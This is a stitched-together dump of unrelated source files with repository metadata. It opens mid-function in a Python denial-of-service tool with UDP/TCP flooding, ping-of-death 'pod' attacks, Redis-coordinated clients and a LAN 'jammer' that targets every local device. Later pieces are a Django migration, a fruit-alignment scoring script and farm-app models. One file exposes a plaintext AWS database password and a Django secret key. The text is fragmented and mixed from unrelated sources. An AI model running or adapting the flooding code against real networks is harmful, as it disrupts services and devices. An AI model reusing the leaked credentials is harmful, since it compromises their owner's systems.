elif 'set r' in com:
print(" ")
try:
rtxtzw = rtxt
rtxt = int(inporarg("Number to Repeat", "set r", com))
if rtxt < 1:
print("Error.")
else:
if rtxtzw < rtxt:
messageszw = messages
messages = (str(messages) * int(rtxt))
else:
messages = (str(messageszw) * int(rtxt))
except:
print("Error.")
print(" ")
elif 'outtxt' in com:
print(" ")
if outtxt == 'true':
print("\033[1;32;40mdisabled")
outtxt = "false"
else:
print("\033[1;32;40menabled")
outtxt = 'true'
print(" ")
elif 'mute' in com:
print(" ")
if outtxtmute == True:
print("\033[1;32;40mdisabled")
outtxtmute = False
outtxt = zwouttxt
else:
print("\033[1;32;40menabled")
zwouttxt = outtxt
outtxt = "false"
outtxtmute = True
print(" ")
elif "method" in com:
print("")
if socketmethod == "udp":
socketmethod = "tcp"
print("\033[1;32;40mMethod: TCP")
else:
socketmethod = "udp"
print("\033[1;32;40mMethod: UDP")
print("")
elif 'bywho' in com:
print(" Taguar258")
elif 'values' in com or 'ls' == com:
print("")
print(" Basic:")
if listwebtrue == "true":
print(" List: %s" % str(listweblist))
else:
print(" Ip: %s" % str(ip))
if listportstrue == "true":
print(" Port: %s" % str(listportslist))
else:
print(" Port: %s" % str(port))
print(" Threads: %s" % str(threads))
print("\n Advanced:")
if len(messages) > 40:
print(" Message: %s ..." % str(messages[:40]))
else:
print(" Message: %s" % str(messages))
print(" Repeat: %s" % str(rtxt))
print(" Success output: %s" % str(outtxt))
print(" Hide output: %s" % str(outtxtmute))
print(" Sleep: %s" % str(sleepy))
print(" Method: %s" % str(socketmethod.upper()))
print(" Stress-testing: %s" % str(stress))
print(" Stress delay: %s" % str(timeforstress))
print(" Next thread delay: %s" % str(autostep))
print(" Activation delay: %s" % str(autostart))
print(" Force stop delay: %s" % str(autostop))
print(" Mb send to server: %s" % str(float(sys.getsizeof(str(messages)) / 1000000)))
print(" Server ip: %s" % str(hip))
print(" Server port: %s" % str(hport))
print(" Server: %s" % str(hserver))
print(" Client: %s" % str(hclient))
print(" Pod Packet size: %s kb" % podsize)
print(" Pod targets: %s" % podtarget)
print(" Pod threads: %s" % podthreads)
print(" Pod delay: %s" % podsleep)
print(" Pod interval: %s" % podinterval)
print(" Pod auto stop: %s" % podautodl)
print(" Version: %s" % str(rsversion))
print(" Command script got: %s" % str(sys.argv))
print("")
elif 'dev redis' in com:
print("")
try:
os.system("for key in $(redis-cli -p " + str(hport) + " keys \*); do echo \"Key : '$key'\" ; redis-cli -p " + str(hport) + " GET $key; done")
except:
print("Error.")
print("")
elif 'set sleep' in com:
try:
print(" ")
sleepy = int(inporarg("Time in Seconds", "set sleep", com))
print(" ")
except:
print(" ")
print("Error")
print(" ")
elif 'stress' in com:
print(" ")
if stress == 'true':
print("\033[1;32;40mdisabled")
stress = "false"
else:
print("\033[1;32;40menabled")
stress = 'true'
print(" ")
elif 'st wait' in com:
print(" ")
timeforstress = inporarg("Time between tests in Seconds", "st wait", com)
try:
timeforstress = int(timeforstress)
except:
print("Error")
print(" ")
elif 'auto step' in com:
print(" ")
try:
autostep = inporarg("Time for next thread to activate in Seconds", "auto step", com)
autostep = int(autostep)
except:
print("Error")
print(" ")
elif 'auto start' in com:
print(" ")
try:
autostart = inporarg("Time for attack to start in Seconds", "auto start", com)
autostart = int(autostart)
except:
print("Error")
print(" ")
elif "pod auto stop" in com:
print(" ")
try:
podautodl = int(inporarg("Auto stop", "pod auto stop", com))
except:
print("Error.")
print(" ")
elif 'auto stop' in com:
print(" ")
try:
autostop = inporarg("Seconds for autostop attack", "auto stop", com)
autostop = int(autostop)
except:
print("Error")
print(" ")
elif 'set mb' in com:
print(" ")
try:
print("Rarely crashing if value too high.")
setmb = inporarg("Mb to send to target", "set mb", com)
setmb = int(setmb)
setmb = int(setmb / 0.000001)
messages = ("r" * setmb)
rtxt = setmb
messageszw = "r"
except Exception as ee:
print("Error", ee)
print(" ")
elif 'set listweb' in com:
try:
print("")
listweblist = inporarg('WebList split by ", "', "set listweb", com).split(', ')
for listnum, listvalue in enumerate(listweblist):
listweblist[listnum] = listweblist[listnum].replace("http://","")
listweblist[listnum] = listweblist[listnum].replace("https://","")
listweblist[listnum] = socket.gethostbyname(listweblist[listnum])
listwebtrue = "true"
print(listweblist)
except:
print("\033[1;32;40m\nError.\n")
print("")
#print("#")
elif 'set listip' in com:
try:
print("")
listweblist = inporarg('IPList split by ", "', "set listip", com).split(', ')
listwebtrue = "true"
#print(listweblist)
except:
print("Error")
#print("#")
print("")
elif 'set listport' in com:
try:
print("")
listportslist = inporarg('PORTList split by ", "', "set listport", com).split(', ')
listportstrue = "true"
except:
print("Error")
print("")
elif 'server start' in com:
if hip != "" and hport != "":
com = ""
try:
hr = redis.Redis(host=hip, port=hport, db=0)
hr.set("clid", "1")
hr.set("onrung", "false")
hr.set("com", "")
hserver = True
print("\033[1;32;40m\nServer started...\n")
except:
print("\033[1;32;40m\nCheck redis and try again.\n")
else:
print("\033[1;32;40m\nIp or/and port not definied.\n")
elif 'client connect' in com:
if hserver:
print("\033[1;32;40m\nCant listen, if already hosting.\n")
else:
com = ""
if hip != "" and hport != "":
try:
hr = redis.Redis(host=hip, port=hport, db=0)
hr.set("com", "")
myclid = str(hr.get("clid"))
hr.set("clid", str(int(myclid) + 1))
hr.set(("clid" + str(myclid)), "0")
hclient = True
print("\033[1;32;40m\nClient started...\n")
except:
print("\033[1;32;40m\nCheck redis and try again.\n")
else:
print("\033[1;32;40m\nNo ip and/or port definied.\n")
elif 'server ip' in com:
print(" ")
hip = inporarg("Ip", "server ip", com)
print(" ")
elif 'server port' in com:
print(" ")
hport = inporarg("Port", "server port", com)
print(" ")
elif 'lan scan' in com:
print(" ")
if nmapinstalledq:
lanscan()
else:
print("Please install nmap.")
print(" ")
elif 'hbi' in com:
print(" ")
try:
zw = (inporarg("Domain", "hbi", com).replace("https://", "").replace("http://", ""))
print(hbi(zw))
except:
print(" Error.")
print(" ")
elif 'speed down' in com:
print("")
print(" Result: %s" % speedtest(inporarg("Website", "speed down", com)))
print("")
elif 'speed ping' in com:
print("")
print(" Result: %s" % speedping(inporarg("Ip", "speed ping", com)))
print("")
elif 'bt scan' in com:
print(" ")
try:
pass
#os.system("hcitool scan")
#os.system("hciconfig -a")
except:
print("Error.")
print(" ")
elif "pod sleep" in com:
print(" ")
try:
podsleep = float(inporarg("Delay", "pod sleep", com))
except:
print("Error.")
print(" ")
elif "pod interval" in com:
print(" ")
try:
podinterval = float(inporarg("Delay", "pod interval", com))
except:
print("Error.")
print(" ")
elif "pod threads" in com:
print(" ")
try:
podthreads = int(inporarg("Threads", "pod threads", com))
except:
print("Error.")
print(" ")
elif 'pod target list' in com:
print(" ")
try:
podtarget = inporarg("List of Domains/Ips split by ', '", "pod target list", com).split(", ")
except:
print("Error.")
print(" ")
elif "pod target" in com:
print(" ")
try:
podtarget = str(inporarg("Domain or ip", "pod target", com))
except:
print("Error.")
print(" ")
elif 'pod size' in com:
print(" ")
try:
podsizezw = int(inporarg("Size in kb", "pod size", com))
if podsizezw < podminsize:
print("Size needs to be more than 4kb.")
elif podsizezw > podmaxsize:
print("Size needs to be less than 65500kb.")
else:
podsize = podsizezw
except:
print("Error.")
print(" ")
elif 'pod checking' == com:
podtesting(podsize, podtarget, podthreads, podsleep, podinterval, podautodl)
elif 'pod run' == com:
#lister
if podsize != podsizelisterstandard:
lister = listeradd("podsize", podsize, lister)
if podthreads != podthreadslisterstandard:
lister = listeradd("podthreads", podthreads, lister)
if podsleep != podsleeplisterstandard:
lister = listeradd("podsleep", podsleep, lister)
if podinterval != podsleeplisterstandard:
lister = listeradd("podinterval", podinterval, lister)
if podautodl != podautodllisterstandard:
lister = listeradd("podautodl", podautodl, lister)
try:
pickle.dump(lister, open("ravenstorm-automated-list.ravenstormlist", "w"))
except:
pass
#print(" ")
agreed()
#print("Running...")
pod(podsize, podtarget, podthreads, podsleep, podinterval, podautodl)
elif "pod jammer" in com:
print(" ")
try:
gateways = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
gateways.connect(("8.8.8.8", 80))
gateway = ".".join((gateways.getsockname()[0].split("."))[:len(gateways.getsockname()[0].split(".")) - 1])
podlocalip = gateways.getsockname()[0]
gateways.close()
nm.scan(hosts=("%s.0/24" % gateway), arguments="-sP")
lanscandev = [(x) for x in nm.all_hosts()]
podtarget = []
for lanscandevice in lanscandev:
#print(lanscandevice)
if lanscandevice != podlocalip and lanscandevice != ("%s.1" % gateway):
#print(lanscandevice)
podtarget.append(lanscandevice)
print("All devices in Internet targeted.", podtarget)
except Exception as e:
if not nmapinstalledq:
print("Please install nmap.")
else:
print("Error.", e)
print(" ")
elif com == "clear" or com == "clear ":
os.system("clear")
elif "post scan" in com:
print("")
beautifulsoupexist = False
try:
from bs4 import BeautifulSoup
beautifulsoupexist = True
except:
print(" Please install BeautifulSoup4.")
lxmlexist = False
try:
import lxml
lxmlexist = True
except:
print(" Please install lxml.")
if beautifulsoupexist and lxmlexist:
postscanurl = str(inporarg("Domain", "post scan", com))
if "http" not in postscanurl:
print(" Error, try with https or http.")
raise Exception("httperror")
print("")
print(" Scanning...")
try:
postscan = requests.get(postscanurl)
postsoup = BeautifulSoup(postscan.content, "lxml")
print(" Results:")
for postscanx in postsoup.find_all("form"):
for postscanl in postscanx.find_all(["input", "button", "text"]):
try:
print(" %s :: %s" % (postscanl.name, postscanl.get("name")))
except:
pass
except:
print(" Error.")
print("")
elif com == "redis run" or com == "redis run ":
os.system("redis-server ./redis-conf/linux/other-redis.conf || redis-server")
elif com == "redis run hide" or com == "redis run hide":
print(" Running as thread in background.")
Thread(target=redisinbackground).start()
elif ">> " in com:
os.system(com[3:])
elif com == "":
pass
else:
if 'help' not in com:
print("""\033[1;32;40m
No such command.
""")
if hclient:
if verbosed:
print("[Clientid: Done]")
try:
hr.set(("clid" + str(myclid)), "1")
except:
print("\033[1;32;40m\nError.\n")
if hserver:
if verbosed:
print("[Set Variables]")
try:
# define local vars
if "set port" in com:
hr.set("port", port)
if "set threads" in com:
hr.set("threads", threads)
if "set ip" in com:
hr.set("ip", ip)
if "set web" in com:
hr.set("ip", ip)
if "set message" in com:
hr.set("messages", messages)
if "set r" in com:
hr.set("rtxt", rtxt)
hr.set("rtxtzw", rtxtzw)
hr.set("messages", messages)
hr.set("messageszw", messageszw)
if "set sleep" in com:
hr.set("sleepy", sleepy)
if "st wait" in com:
hr.set("timeforstress", timeforstress)
if "auto step" in com:
hr.set("autostep", autostep)
if "auto start" in com:
hr.set("autostart", autostart)
if "auto stop" in com:
hr.set("autostop", autostop)
if "set mb" in com:
hr.set("setmb", setmb)
if "set listweb" in com:
hr.set("listweblist", listweblist)
if "set listport" in com:
hr.set("listportslist", listportslist)
if "method" in com:
hr.set("method", socketmethod)
hr.set("listwebtrue", listwebtrue)
time.sleep(1)
if verbosed:
print("[Done: True]")
hr.set("sdone", "true")
time.sleep(0.3)
except:
print("\033[1;32;40m\nError.\n")
if hserver and com != "":
if verbosed:
print("[Wait for other Clients]")
try:
hr.set("com", com)
loopchecker = True
while loopchecker:
time.sleep(0.2)
loopingtt = True
for t in range((int(hr.get("clid")) - 1)):
t = (t + 1)
#print(hr.get(("clid" + str(t))))
#print(t)
if hr.get(("clid" + str(t))) != "1":
loopingtt = False
#print(loopingtt)
if loopingtt:
for f in range((int(hr.get("clid")) - 1)):
f = (f + 1)
#reset
hr.set(("clid" + str(f)), "0")
hr.set("com", "")
loopchecker = False
break
hr.set("com", "")
hr.set("onrung", "false")
except:
print("\033[1;32;40mFailed to send command...\n")
| [
"noreply@github.com"
] | noreply@github.com |
ca233501fb5c9fda5f913bf4b8585651b383ef8a | 5ad3cdae21d6a594d2e499406bd3159c9e635ce8 | /yatube/posts/migrations/0005_auto_20210607_1847.py | e5b204084a85b0f5de89704ec3e5acc475a3829e | [] | no_license | Priest-4612/hw05_final | 18e24058a29de7b4533f8a1098210998277ace5b | 2ab6809b36a7c2f42c14a33deedca7cf8ce1cdf5 | refs/heads/master | 2023-06-15T00:50:48.783136 | 2021-07-12T18:39:31 | 2021-07-12T18:39:31 | 382,963,596 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 346 | py | # Generated by Django 2.2.9 on 2021-06-07 15:47
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('posts', '0004_auto_20210530_0018'),
]
operations = [
migrations.AlterModelOptions(
name='post',
options={'ordering': ['-pub_date']},
),
]
| [
"prie4612@gmail.com"
] | prie4612@gmail.com |
67f524f456ca9e7e1feca8663cf6713d9eca575c | 18670f3ce7e626a60423df66e090044054f35488 | /desy_r/private/secretsettings.py | b9019ce36c8f3917c03334e96365999a0558500d | [] | no_license | camrock1/desy-reporting | b64d5dd467a2f20c796c1382e1e3fbe857587a0f | c523dea758f22e3ee5c1a581bc78940665a1696a | refs/heads/master | 2022-02-12T16:43:01.044690 | 2016-11-04T02:38:27 | 2016-11-04T02:38:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 117 | py | AWS_RDS_USER = 'alexlanders'
AWS_RDS_PASS = 'Manf0rd123'
S_KEY = '-#2^f&v4_0nd!6%9oi*stx1pb6ja=fuoyv%1kg_d=ypia*9(7+' | [
"alex.landers@me.com"
] | alex.landers@me.com |
56da23f9a0d297df1b7ab5e52d14a535ed9dc9fe | 6113c356eb4fae7bfb04c4bd2b121f130ef41a14 | /content/migrations/0022_projects_direction.py | 2ea9195795802a911667d7d1035d9100af739cdf | [] | no_license | slonidet/avcsite | 4e8950296551e80003a5f76b934a043b8fd2f02e | 8034a75bbe8f2e2973761502413df76e918e1c2b | refs/heads/master | 2020-06-17T19:37:43.085881 | 2016-11-29T14:40:03 | 2016-11-29T14:40:03 | 74,976,059 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,298 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-11-25 10:52
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('content', '0021_remove_projects_direction'),
]
operations = [
migrations.AddField(
model_name='projects',
name='direction',
field=models.CharField(choices=[('SOC', '\u0421\u043e\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0435'), ('SOB', '\u0421\u043e\u0431\u044b\u0442\u0438\u0439\u043d\u043e\u0435'), ('MED', '\u041c\u0435\u0434\u0438\u0446\u0438\u043d\u0441\u043a\u043e\u0435'), ('KUL', '\u041a\u0443\u043b\u044c\u0442\u0443\u0440\u043d\u043e-\u043f\u0440\u043e\u0441\u0432\u0435\u0442\u0438\u0442\u0435\u043b\u044c\u0441\u043a\u043e\u0435'), ('KOR', '\u041a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u043e\u0435'), ('SER', '\u0421\u0435\u0440\u0435\u0431\u0440\u044f\u043d\u043e\u0435'), ('OBR', '\u0412 \u043e\u0431\u0440\u0430\u0437\u043e\u0432\u0430\u043d\u0438\u0438'), ('OTH', '\u0414\u0440\u0443\u0433\u043e\u0435')], default='OTH', max_length=5, verbose_name='\u041d\u0430\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u043f\u0440\u043e\u0435\u043a\u0442\u0430'),
),
]
| [
"dmitrysulin@gmail.com"
] | dmitrysulin@gmail.com |
81c12aa06351a46d66c2728acf26102e592fa5da | 3abd7d66e5e3923383faaef19ff2cf8f1bd5f72e | /evaluate.py | 6ac5ea4412305a1c657353c9b256c5f3b061f87d | [] | no_license | Piaktipik/RVSS_Workshop | 9af190873bff179b3529bb3533262165bcf23109 | 35b5c822ef6da91e73be9322c9354aa62234cb31 | refs/heads/master | 2023-02-27T17:47:25.693839 | 2021-02-05T00:34:35 | 2021-02-05T00:34:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,767 | py | #!/usr/bin/env python3
import ast
import numpy as np
import json
#
def parse_groundtruth(fname: str) -> dict:
with open(fname,'r') as f:
gt_dict = ast.literal_eval(f.readline())
aruco_dict = {}
for key in gt_dict:
aruco_dict[key] = np.reshape([gt_dict[key]["x"], gt_dict[key]["y"]], (2,1))
return aruco_dict
def parse_user_fruit(fname: str) -> dict:
with open(fname, 'r') as f:
usr_dict = ast.literal_eval(f.read())
fruit_dict = {}
for f in usr_dict:
fruit_dict[f] = np.reshape([usr_dict[f][0],usr_dict[f][1]], (2,1))
return fruit_dict
def match_aruco_points(aruco0: dict, aruco1: dict):
missing_fruit = []
points0 = []
points1 = []
keys = []
for key in aruco1:
if not key in aruco0:
missing_fruit.append(key)
continue
if np.isnan(aruco0[key][0]) or np.isnan(aruco0[key][1]):
missing_fruit+=1
continue
points0.append(aruco0[key])
points1.append(aruco1[key])
keys.append(key)
return np.hstack(points0), np.hstack(points1), missing_fruit, keys
def parse_user_fruit(fname : str) -> dict:
with open(fname, 'r') as f:
usr_dict = ast.literal_eval(f.read())
fruit_dict = {}
for f in usr_dict:
fruit_dict[f] = np.reshape([usr_dict[f][0],usr_dict[f][1]], (2,1))
return fruit_dict
def solve_umeyama2d(points1, points2):
# Solve the optimal transform such that
# R(theta) * p1_i + t = p2_i
assert(points1.shape[0] == 2)
assert(points1.shape[0] == points2.shape[0])
assert(points1.shape[1] == points2.shape[1])
# Compute relevant variables
num_points = points1.shape[1]
mu1 = 1/num_points * np.reshape(np.sum(points1, axis=1),(2,-1))
mu2 = 1/num_points * np.reshape(np.sum(points2, axis=1),(2,-1))
sig1sq = 1/num_points * np.sum((points1 - mu1)**2.0)
sig2sq = 1/num_points * np.sum((points2 - mu2)**2.0)
Sig12 = 1/num_points * (points2-mu2) @ (points1-mu1).T
# Sig12 = 1/num_points * (points2-mu2) @ (points1-mu1).T @ np.linalg.pinv((points1-mu1)@(points1-mu1).T)
# Use the SVD for the rotation
U, d, Vh = np.linalg.svd(Sig12)
S = np.eye(2)
if np.linalg.det(Sig12) < 0:
S[-1,-1] = -1
# Return the result as an angle and a 2x1 vector
R = U @ S @ Vh
theta = np.arctan2(R[1,0],R[0,0])
x = mu2 - R @ mu1
return theta, x
def apply_transform(theta, x, points):
# Apply an SE(2) transform to a set of 2D points
assert(points.shape[0] == 2)
c, s = np.cos(theta), np.sin(theta)
R = np.array(((c, -s), (s, c)))
points_transformed = R @ points + x
return points_transformed
def compute_rmse(points1, points2):
# Compute the RMSE between two matched sets of 2D points.
assert(points1.shape[0] == 2)
assert(points1.shape[0] == points2.shape[0])
assert(points1.shape[1] == points2.shape[1])
num_points = points1.shape[1]
residual = (points1-points2).ravel()
MSE = 1.0/num_points * np.sum(residual**2)
return np.sqrt(MSE)
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser("Solve the RVSS alignment problem")
parser.add_argument("groundtruth", type=str, help="The ground truth file name.")
parser.add_argument("estimate", type=str, help="The estimate file name.")
args = parser.parse_args()
gt_aruco = parse_groundtruth(args.groundtruth)
us_aruco = parse_user_fruit(args.estimate)
us_vec, gt_vec, missing, taglist = match_aruco_points(us_aruco, gt_aruco)
rmse = compute_rmse(us_vec, gt_vec)
print("The RMSE before alignment: {}".format(rmse))
theta, x = solve_umeyama2d(us_vec, gt_vec)
us_vec_aligned = apply_transform(theta, x, us_vec)
print("The following parameters optimally transform the estimated points to the ground truth.")
print("Rotation Angle: {}".format(theta))
print("Translation Vector: ({}, {})".format(x[0,0], x[1,0]))
rmse = compute_rmse(us_vec_aligned, gt_vec)
print("Successfully detect {} kinds of fruits, missing {}".format(4-len(missing), missing))
print("The RMSE after alignment: {}".format(rmse))
mark = (100-25*len(missing))*(1.05-rmse/2)
print()
print("Pred Fruit")
print(taglist)
print("Real Locations")
print("np.array("+np.array2string(gt_vec, precision=4, separator=',')+')')
print("Aligned Pred Locations")
print("np.array("+np.array2string(us_vec_aligned, precision=4, separator=',')+')')
print("The final mark is {}".format(mark))
| [
"u6139430@anu.edu.au"
] | u6139430@anu.edu.au |
72e9179d8da40397dd4755d7c720ec0e48a57713 | 8fd559be6696d8913e60e9b8628c064305a828bd | /fruit/models.py | cb2399f1c5dc6965539d6864452b4e3562ea08fe | [] | no_license | shravanchandra/farmapp | 003bfd14804ae1b5026e3bd64b07891d5402ab3b | 8bbedf218660790497cae7d21b8092e4b39d490e | refs/heads/master | 2021-01-25T16:10:10.191844 | 2016-04-03T11:07:20 | 2016-04-03T11:07:20 | 51,570,353 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 489 | py | from django.db import models
from django.contrib.auth.models import User
from root.models import *
from api.models import *
# Create your models here.
class Fruit_Transaction(models.Model):
description = models.TextField()
farm = models.ForeignKey(Farming)
day = models.DateField()
delivery = models.ForeignKey(Delivery)
user = models.ForeignKey(User)
price = models.FloatField()
no_of_units_sold = models.IntegerField()
yields = models.ForeignKey(Yield)
| [
"Shravan.Kumar@polestartechnologyltd.com"
] | Shravan.Kumar@polestartechnologyltd.com |
b0445f7811e97fb43d9cdb3bfdad9449cab3f128 | e6376e614dbf63df8381af0333c81af5b1434bec | /python/08makechange_ice.py | 4eb6d4d5d7991fa90edaafc0c55a5e17846629ad | [] | no_license | billhowland/PythonLabs | 215082b56e17c5454e6e40a64ef44a55ae7ba689 | b287cefd64ed5f30b6e9db65fc9cd895e2f7da6e | refs/heads/master | 2021-06-24T23:53:41.265111 | 2019-05-28T02:02:17 | 2019-05-28T02:02:17 | 168,642,589 | 2 | 0 | null | 2021-06-10T21:23:57 | 2019-02-01T04:34:20 | Python | UTF-8 | Python | false | false | 832 | py | # makechange_ice.py
print('This program calculates coins for making change')
run = 1
while(run):
while True:
total = input('Enter the amount > ').strip().strip('$')
try:
total = (float(total)) * 100
if total < 0:
raise ValueError
break
except ValueError:
print('Enter positive numbers only, dude.')
q = (total // 25)
print((str(round(q))) + (' Quarters'))
remaind = total - (q * 25)
d = (remaind // 10)
print((str(round(d))) + (' Dimes'))
remainn = remaind - (d * 10)
n = (remainn // 5)
print((str(round(n))) + (' Nickles'))
remainp = remainn - (n * 5)
p = (remainp // 1)
print((str(round(p))) + (' Pennies'))
ask = input('Quit? Y/N > ').strip().lower()
if ask == 'y':
run = 0
| [
"electronzero@comcast.net"
] | electronzero@comcast.net |
004c56bd494899dd28e119a7a35e0bbae4c986b5 | e99509d3239513e37742646632352d914f1132cf | /stability-1/bgpstream_stability.py | 6dad3e78a00a02b8e566d24841a76c0e77904db3 | [] | no_license | CAIDA/bgp-hackathon | 4c8eab6be2c28576dc6953837711a504f47af2e0 | b95cfd0d6b22f6d61f81e3eca93e177b3d08ae21 | refs/heads/master | 2021-01-17T07:02:35.859766 | 2016-06-20T21:06:48 | 2016-06-20T21:06:48 | 43,771,622 | 29 | 11 | null | 2016-03-07T23:02:00 | 2015-10-06T18:53:52 | Perl | UTF-8 | Python | false | false | 5,418 | py | #!/usr/bin/env python
#
# Copyright (C) 2015
# Authors: Nathan Owens & Andrew Mulhern
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation; either version 2 of the License, or (at your option) any later
# version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program. If not, see <http://www.gnu.org/licenses/>.
#
import sys
import json
import copy
import math
import urllib
import multiprocessing
from _pybgpstream import BGPStream, BGPRecord, BGPElem
from collections import defaultdict
from datetime import datetime
def deal_with_time_bucket_junk(prefix, timestamp):
if prefix not in raw_bgp_stream_data:
newBuckets = copy.deepcopy(buckets)
raw_bgp_stream_data[prefix] = newBuckets
duration = timestamp - stream_start
bucket = int(duration / 300)
try:
raw_bgp_stream_data[prefix][bucket]["count"] += 1
except:
pass
def create_time_buckets(start, end):
time_step = 300 # 5 multiprocessing
buckets = []
for x in xrange(start, end, time_step):
new_end = x + 300
window = {"start": x, "end": new_end, "count": 0}
buckets.append(window)
return buckets
def get_ripe_probes(prefix_list):
def get_probe_list(ip_proto, prefix_data, return_dict):
prefix = prefix_data[0]
count = prefix_data[1]
bucket_data = prefix_data[2]
url = "https://atlas.ripe.net/api/v1/probe/?format=json&prefix_%s=%s" % (ip_proto, prefix)
probe_data = json.loads(urllib.urlopen(url).read())
probe_count = probe_data["meta"]["total_count"]
probe_ids = []
if probe_count > 0:
for probe in probe_data["objects"]:
probe_id = probe["id"]
probe_ids.append(probe_id)
if len(probe_ids) > 0:
return_dict[prefix] = {"count": count, "bucket_data": bucket_data, "probe_count": probe_count, "probe_ids": probe_ids}
return
jobs = []
manager = multiprocessing.Manager()
return_dict = manager.dict()
for prefix_data in prefix_list:
prefix = prefix_data[0]
if "." in prefix:
job = multiprocessing.Process(target=get_probe_list, args=("v4", prefix_data, return_dict))
elif ":" in prefix:
job = multiprocessing.Process(target=get_probe_list, args=("v6", prefix_data, return_dict))
jobs.append(job)
job.start()
for job in jobs:
job.join()
return dict(return_dict)
if __name__ == "__main__":
try:
stream_start = int(sys.argv[1])
stream_end = int(sys.argv[2])
out_file_name = sys.argv[3]
except:
print "Usage: %s [start time] [end time] [output file name]" %(sys.argv[0])
exit()
#stream_start = 1454284800
#stream_end = 1454288400
buckets = create_time_buckets(stream_start, stream_end)
prefixList = []
raw_bgp_stream_data = {}
stream = BGPStream()
rec = BGPRecord()
stream.add_filter('collector', 'rrc06')
stream.add_filter('record-type', 'updates')
stream.add_interval_filter(stream_start, stream_end)
stream.start()
while(stream.get_next_record(rec)):
elem = rec.get_next_elem()
while(elem):
prefix = elem.fields.get("prefix", "")
time_stamp = rec.time # unix epoc timestamp 1427846670
if prefix != "":
deal_with_time_bucket_junk(prefix, time_stamp)
elem = rec.get_next_elem()
for prefix in list(raw_bgp_stream_data):
for bucket in list(raw_bgp_stream_data[prefix]):
if bucket["count"] < 3:
raw_bgp_stream_data[prefix].remove(bucket)
for prefix in raw_bgp_stream_data:
index = 0
max_index = 0
max_val = 0
last_val = 0
for bucket in raw_bgp_stream_data[prefix]:
curr = bucket["count"]
if curr > last_val:
max_val = curr
index += 1
last_val = curr
if raw_bgp_stream_data[prefix]:
prefixList.append((prefix, max_val, raw_bgp_stream_data[prefix][max_index]))
prefixListWithProbes = get_ripe_probes(prefixList)
import get_probe_data
results = []
for prefix, values in prefixListWithProbes.iteritems():
start_time = values["bucket_data"]["start"]
end_time = values["bucket_data"]["end"]
count = values["count"]
probe_list = values["probe_ids"]
for probe in probe_list:
packet_loss = get_probe_data.get_packet_loss(probe, start_time, end_time)
results.append({"prefix":prefix, "count":count, "start_time":start_time, "end_time":end_time, "probe":probe, "packet_loss":packet_loss})
sorted_results = list(sorted(results, reverse=True, key = lambda x: (x["count"], x["packet_loss"])))
out_file = open(out_file_name, "w")
out_file.write(json.dumps(sorted_results, indent=3))
out_file.close()
| [
"Nathan_Owens@cable.comcast.com"
] | Nathan_Owens@cable.comcast.com |
65833106612dba86e94d7134a9ebee17684ede08 | a7f16c95f973905e880ad4dc277fbba890486654 | /wildlifecompliance/migrations/0549_callemail_dead.py | ceb5034f13c1d94a0e1fcfc6c4f99e9b1da06457 | [
"Apache-2.0"
] | permissive | dbca-wa/wildlifecompliance | 9e98e9c093aeb25dbb7ff8d107be47e29bcd05e1 | cb12ad9ea1171f10b5297cdb7e1eb6ea484e633d | refs/heads/master | 2023-08-08T14:37:05.824428 | 2023-07-31T02:57:23 | 2023-07-31T02:57:23 | 232,276,030 | 1 | 17 | NOASSERTION | 2023-07-31T02:57:24 | 2020-01-07T08:12:53 | Python | UTF-8 | Python | false | false | 466 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.29 on 2021-11-17 04:15
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('wildlifecompliance', '0548_callemail_call_type'),
]
operations = [
migrations.AddField(
model_name='callemail',
name='dead',
field=models.BooleanField(default=False),
),
]
| [
"thakurpriya1990@gmail.com"
] | thakurpriya1990@gmail.com |
bc264dca1a83cbfdac6a1a6a8e809acd0f706f6c | 85a9ffeccb64f6159adbd164ff98edf4ac315e33 | /pysnmp-with-texts/BGP4-MIB.py | 82ca958d84278f8a01207e0ae3316c34872f82b6 | [
"Apache-2.0",
"LicenseRef-scancode-warranty-disclaimer",
"LicenseRef-scancode-proprietary-license",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | agustinhenze/mibs.snmplabs.com | 5d7d5d4da84424c5f5a1ed2752f5043ae00019fb | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | refs/heads/master | 2020-12-26T12:41:41.132395 | 2019-08-16T15:51:41 | 2019-08-16T15:53:57 | 237,512,469 | 0 | 0 | Apache-2.0 | 2020-01-31T20:41:36 | 2020-01-31T20:41:35 | null | UTF-8 | Python | false | false | 25,509 | py | #
# PySNMP MIB module BGP4-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/BGP4-MIB
# Produced by pysmi-0.3.4 at Wed May 1 11:35:09 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
Integer, OctetString, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "Integer", "OctetString", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueRangeConstraint, ConstraintsIntersection, ValueSizeConstraint, ConstraintsUnion, SingleValueConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueRangeConstraint", "ConstraintsIntersection", "ValueSizeConstraint", "ConstraintsUnion", "SingleValueConstraint")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
